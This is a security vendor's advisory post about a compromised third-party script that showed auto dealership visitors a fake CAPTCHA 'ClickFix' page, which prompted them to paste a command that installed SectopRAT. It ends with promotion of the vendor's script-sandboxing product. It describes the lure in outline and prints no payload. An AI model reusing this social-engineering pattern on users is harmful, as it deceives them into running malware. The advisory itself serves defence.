SOURCE DEFENSE RESEARCH INTELLIGENCE NEWS 

March 25, 2025

THIRD PARTY SERVICE IDOSTREAM[.]COM COMPRIMISED; ATTACK VIA SOCIAL ENGINEERING

As recently reported in the media, over a hundred auto dealerships worldwide were compromised by this malicious script,  which generated a ClickFix webpage leading to the installation of SectopRAT malware.

ClickFix is a social engineering tactic where cybercriminals deceive users into copying and executing malicious commands, often through deceptive pop-ups, fake error messages, or phishing emails. This method exploits user trust to install malware, steal information, or gain unauthorized system access.​

In this case, a seemingly legitimate fake CAPTCHA window appears.

However, upon clicking the checkbox, instructions labeled "Verification Steps" emerge, prompting the user to open the command line and paste the clipboard contents—which is the malicious code strategically placed by the compromised script.

Once these actions are completed, the malicious code—specifically SectopRAT malware—executes directly on the site visitor's PC. This malware can steal information and even control browser sessions. Additionally, it possesses several anti-virtual machine (VM) and anti-emulator capabilities.​

Since the publication of the attack the vendor removed the malicious code so this threat is no longer active.

How does Source Defense protect you from such attacks?

Source Defense's proprietary solution features a unique script policy called 'Isolated,' which effectively isolates scripts into a sandbox environment. This isolation ensures that even actions traditionally challenging to monitor and prevent, such as unauthorized redirects that is used in this attack, are effectively blocked. 

Beyond addressing elusive threats like unauthorized redirects, the Source Defense research team proactively identifies and mitigates emerging attack vectors. This commitment ensures that customers remain protected against a wide range of client-side attacks, including digital skimming and formjacking, safeguarding sensitive data and maintaining compliance with security standards.